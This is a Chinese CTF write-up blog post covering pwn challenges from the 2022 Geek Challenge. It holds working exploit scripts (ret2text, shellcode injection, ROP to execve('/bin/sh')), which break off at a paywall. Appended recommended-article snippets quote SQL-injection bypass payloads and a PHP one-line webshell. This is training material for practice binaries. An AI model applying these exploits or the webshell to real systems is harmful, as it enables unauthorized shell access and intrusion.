【pwn】2022 极客大挑战

最新推荐文章于 2025-06-02 04:20:29 发布
最新推荐文章于 2025-06-02 04:20:29 发布
阅读量1.6k 收藏 2
点赞数 4
CC 4.0 BY-SA版权
分类专栏: ctf 与君共勉 pwn 文章标签: pwn ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woodwhale/article/details/127991807

【pwn】2022 极客大挑战

前言

又是一年的极客大挑战,又老了一岁,也只有打打新生赛才能有第一次接触ctf快乐了,现在各种比赛的pwn都是纯纯的坐牢~

本次题解的所有脚本使用的类库都是本人自己整合的一个库,github地址:https://github.com/Awoodwhale/pwn_all_in_one

nc

直接nc连接

pwn1_1

简单的ret2text

from pwntools import *

init("./pwn1_1")

backdoor = 0x401196

payload = b"b"*0x10 + b"woodwood" + p64(backdoor)

sl(payload)

ia()

pwn2_1

也是有后门的

from pwntools import *

init("./pwn2_1")

payload = b"\x00"*0x10 + b"woodwood" + p64(0x4011EF)
sl(payload)
ia()

pwn2_2

简单的ret2shellcode

from pwntools import *

init("./pwn2_2")

backdoor = 0x4040A0

sla("number:", asm(shellcraft.sh()))
sla("buf: ", b"b"*0x18 + p64(backdoor))

ia()

pwn2_3

首先获取栈地址,调试查看偏移获取ret_address的地址,在栈里写shellcode,最后用任意写把ret_address的地址写成存放shellcode的栈地址,这样就能执行shellcode了(这种方式需要保证shellocde的长度不会覆盖到canary,否则会触发canary的保护机制,当然还有一种方式,可以把stack_chk_fail的got表改成shellcode的地址)

#!/usr/bin/python3
# -*- coding: UTF-8 -*-
# -----------------------------------
# @File    :  exp2_3.py
# @Author  :  woodwhale
# @Time    :  2022/11/02 15:27:21
# -----------------------------------

from pwntools import *

# context.log_level = "debug"

init("./pwn2_3")

io: tube = pwnio.io
elf: ELF = pwnio.elf
libc: ELF = pwnio.libc

pop_rdi = 0x0000000000001383

ru("0x")
stack_addr = leak(i16(rl()), "stack_addr")

sa("Give me your buf: ", asm(shellcraft.sh()))
sla("rb_write to you:", str(stack_addr + 0x118))
tmp = hex(stack_addr)[2:]

# dbg();pau()
sa(
    "Data: ",
    p8(i16(tmp[-2:]))
    + p8(i16(tmp[-4:-2]))
    + p8(i16(tmp[-6:-4]))
    + p8(i16(tmp[-8:-6]))
    + p8(i16(tmp[-10:-8]))
    + p8(i16(tmp[-12:-10])),
)


ia()

pwn3_1

不是很想ret2libc,所以使用了一个独特的gadget来进行任意地址写mov_rsi_eax

原理就是把一个bss段地址写入/bin/sh\x00,然后使用syscall调用execve("/bin/sh",NULL,NULL)

因为我找来的gadget是用的eax,所以每次只能写32位,所以这里/bin/sh\x00分了两次写,写完了之后就调用syscall就好啦!

from pwntools import *

context.log_level = "debug"
init("./pwn3_1")

pop_rax = 0x0000000000449307
pop_rdi = 0x0000000000401882
pop_rsi = 0x000000000040f1ce
pop_rdx = 0x000000000040178f
syscall = 0x00000000004012d3
syscall_ret = 0x0000000000416f04

mov_rsi_eax = 0x000000000047bc06

def fflat(lst):
    res = b""
    for l in lst:
        res += p64(l)
    return res

payload = b"b"*0x18 + fflat([
    pop_rsi, 0x4c3000,
    pop_rax, 0x6e69622f,    # /bin
    mov_rsi_eax,
    0x401D25
])
最低0.47元/天 解锁文章

200万优质内容无限畅学
pwn】 [极客挑战 2019]Not Bad
Nothing
03-10 1213
例行检查 开了沙箱 程序逻辑很简单,存在0x18字节溢出,看是否能进行栈迁移,目前可控输入只有buf,但是buf只有0x20小不够rop,所以尝试别的方法。程序在最开始mmap了一块内存,可写可执行,那么接下来目标就是1.在这块内存上写shellcode 2.跳转过来执行 由于不能rop且栈是可执行的想到能不能进行jmp rsp。在程序中找到了这个指令。 那么就可以在buf上布置read以...
【misc】2021 极客挑战(部分)
woodwhale的博客
11-29 4504
【misc】2021 极客挑战(部分) 1、今天有被破防吗? 0x1 最早上的一批题目,当时没什么思路。后来pwn神在群里提到了RGB,瞬间懂了! 参考链接: gaps拼图 0x2 下载附件得到一个很长的txt文本,其中每一行都是三个数字。如果知道是RGB就好处理了。 0x3 注意到一共1166400行,那么就是1080*1080的规格 简单的python脚本处理一下图片 from PIL import Image res = [] with open("./ans.txt","r") as f
qsnctf 登录试试(2022极客挑战) wp
arcuied
11-30 541
qsnctf 登录试试(2022极客挑战) wp
BUUCTF[极客挑战 2019]EasySQL 1题解
2301_79896143的博客
06-02 1390
SQL注入基础题解 本文以"[极客挑战 2019]EasySQL"为例,解析了SQL注入的基本原理和解题过程。题目是一个采用GET请求的登录界面,通过输入测试发现存在SQL注入漏洞。文章详细分析了数字型和字符型注入的区别,指出该题属于字符型注入。解题采用"万能密码"方法,通过构造1' or '1'='1等payload绕过验证。最终获得flag{c245efae-9088-4dec-8c2e-5c34c73392e9},展示了初级SQL注入的类型判断和payload构造技巧。
GeekChallenge 2024 第十五届极客挑战 pwn AK
YX-hueimie
11-21 2393
本来是没打这个比赛,被鱼神喊来炸鱼,解了一道题(struct_one_byte),尝到炸鱼的甜头了,就全炸了,属于是炸爽了。新生赛题目难度还是蛮友好的,最难绷的题是FindG???t和ez_srop,其他题目比较容易就随便讲讲应该是最后一次认真打新生赛了,难度太低了,很多时候是浪费时间。
【记】2021年第十二届极客挑战
热门推荐
sid10t.
11-23 4万+
文章目录前言解题RERe0刘壮桌面美化师买ActivityWEBDarkWelcome2021babysql 前言 极客挑战对萌新还是很友好的,特别适合我这种????   解题   RE Re0 F12就行,SYC{Welcome_to_Geek_challenge2021};   刘壮桌面美化师 根据主要类看出这道 APK 题就是签到题,在资源下找 String 即可,SYC{We1c0m3_t0_4ndRo1d_ReV3rse!};   买Activity
【python】OCR
bryant_meng
12-16 3381
先看看百度百科对 OCR 的定义: OCR (Optical Character Recognition,光学字符识别)是指电子设备(例如扫描仪或数码相机)检查纸上打印的字符,通过检测暗、亮的模式确定其形状,然后用字符识别方法将形状翻译成计算机文字的过程;即,针对印刷体字符,采用光学的方式将纸质文档中的文字转换成为黑白点阵的图像文件,并通过识别软件将图像中的文字转换成文本格式,供文字处理软件进一步编辑加工的技术。如何除错或利用辅助信息提高识别正确率,是OCR最重要的课题,ICR(Intelligent C.
[极客挑战 2019]Not Bad的另一种思路
chennbnbnb的博客
10-22 342
保护 漏洞 算上rbp只有0x20的溢出空间 思路1 利用jmp rsp的GG执行栈上的shellcode,这个思路用的人很多,就不再说了 思路2:不使用jmp rsp 如果需要开启shellcode,最常用的就是ret到shellcode的地址,为了获取shellcode地址,那么就有了两个选择 泄露栈地址,做不到 栈迁移到一个已知位置 通过leave指令使得rbp = 已知空间buf之后,需要在0x18长度内完成两件事情 向buf中写入exp leave+ret让rsp迁
2024第七届巅峰极客网络安全技能挑战赛初赛项目集-包含Misc简历题目涉及真实产样本与远程文件分发服务Crypto后门密码学逆向工程基础Pwn盲注漏洞利用Web游戏与RCE及Se.zip
最新发布
08-23
2024第七届巅峰极客网络安全技能挑战赛初赛项目集_包含Misc简历题目涉及真实产样本与远程文件分发服务Crypto后门密码学逆向工程基础Pwn盲注漏洞利用Web游戏与RCE及Se.zip待开始任务
BUUCTF-极客挑战2019
Atkx's Blog
01-27 792
[极客挑战2019]Http [极客挑战2019]upload 将里面的内容改为一句话木马 GIF89a <script language="php">eval($_POST['shell']);</script> /upload/test.phtml [极客挑战2019]PHP 访问靶机地址 提到了备份网站,直接访问www.zip文件,flag.php里面有个假的flag 查看一下index.php,发现要用get方式提交参数select 再查看class.php
2018极客挑战-not reverse
博客
11-30 543
欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 学好数学很重要 学好数学很重要 学好数学很重要 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: ...
巅峰极客2022wp
Pysnow's Blog
08-27 933
巅峰极客2022wp
第十届极客挑战pwn
doudoudedi
11-12 818
Find tools 直接nc上去使用pwntool就可以看到base64字符串解密当作密码提即可 from pwn import * import base64 p=remote('pwnto.fun',9999) p.recvuntil('The key is :\n') psd=p.recv(24) psd=base64.b64decode(psd) log.success('pas: '+...
极客挑战2019php,CTF-Web-[极客挑战 2019]PHP
weixin_39869693的博客
04-02 210
CTF-Web-[极客挑战 2019]PHP博客说明文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!CTP平台网址题目Web类,[极客挑战 2019]PHP 打开题目的实例 思路看到这种题目,我爱了特别是这个动画效果,做安全的前端也这么优秀吗?佬不过我发下一个问题,这个动画搞的我打不开源代码了...
极客挑战wp(部分)
weixin_45396639的博客
04-26 429
1.Esay Sql 输入万能密码 2.Http 首先查看源码,发现有一个链接 去那个链接看看 构造http头,Referer:https://www.Sycsecret.com 发送看看,根据提示改user-agent 继续发送,继续根据提示改http头,添加X-Forwarded-For:127.0.0.1 最后,得到flag 3.Secret File 去网页源码看看 去链接...
极客挑战2020wp
Atkx's Blog
11-29 1635
Crypto 二战情报员刘壮 简介:你能知道刘壮在说什么?得到的flag包裹上SYC{} .-…/.----/…-/–…/…/…-/…-/-./–./…–.-/…/…–.-/–…/.----/-.–/.---- 提示:刘壮早上起床打摩丝 提交flag,发现错误,转换成小写还是不对,查看了一下群里给的hint,成功提交 铠甲与萨满 简介:YEI{roafnagtmroafnagtm_hgtmhgtmhgtm} 提示:kaisa? 偏移量为6时,得到flag MISC 一“页”障目 作者:lingze 简
pwn】2021 极客挑战(部分)
woodwhale的博客
11-29 3810
pwn】2021 极客挑战(部分) 1、pwn777 0x1 怎么说呢,这题就是硬用fmt写rop链。 不过也是第一次见到这种fmt,也算是见了新题型了。 0x2 我们打开IDA进行逆向分析 就俩主要函数,我就当第一关和第二关吧 先进入game函数,发现可以通过buf覆盖seed的后32位,srand这个函数的参数是int型,所以我们这里可以通过buf覆盖seed,然后导入ctypes库,使用题目给的libc进行获取随机数,重复10次就可以了。 0x3 第二关就有点自由了,这种自由就是看你怎么想到
BUU[极客挑战]LoveSQL
Marsper的博客
11-16 386
题目链接:http://8d2d10b1-b8e7-4ce4-a2f2-6b58d8c77ae9.node3.buuoj.cn/ 首先,测试发现是单引号的字符型注入 万能密码登录测试 用户名:admin’ or 1=1 # 密码:1 登陆成功后使用联合查询。 注意:输入框的#,直接使用hackbar地址栏,需将#进行URL编码,即替换为%23 一、爆字段 使用order by语句 check.php?username=admin' order by 1 %23&password=1 check.
CTF Geek Challenge——第十一届极客挑战Crypto Write Up
无限迭代中......
11-18 1182
比赛时间:2020年10月17日早上9点 比赛时限:一个月 参考文章
二进制利用入门:Pwn挑战解析
"Introduction to Pwn"这份手册将引导你进入一个充满挑战和机遇的世界,通过实践pwn挑战,你将提升自己的技能,成为一名更全面的安全专家,不仅能在比赛中取得好成绩,还能在现实世界中保护和增强系统的安全性。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值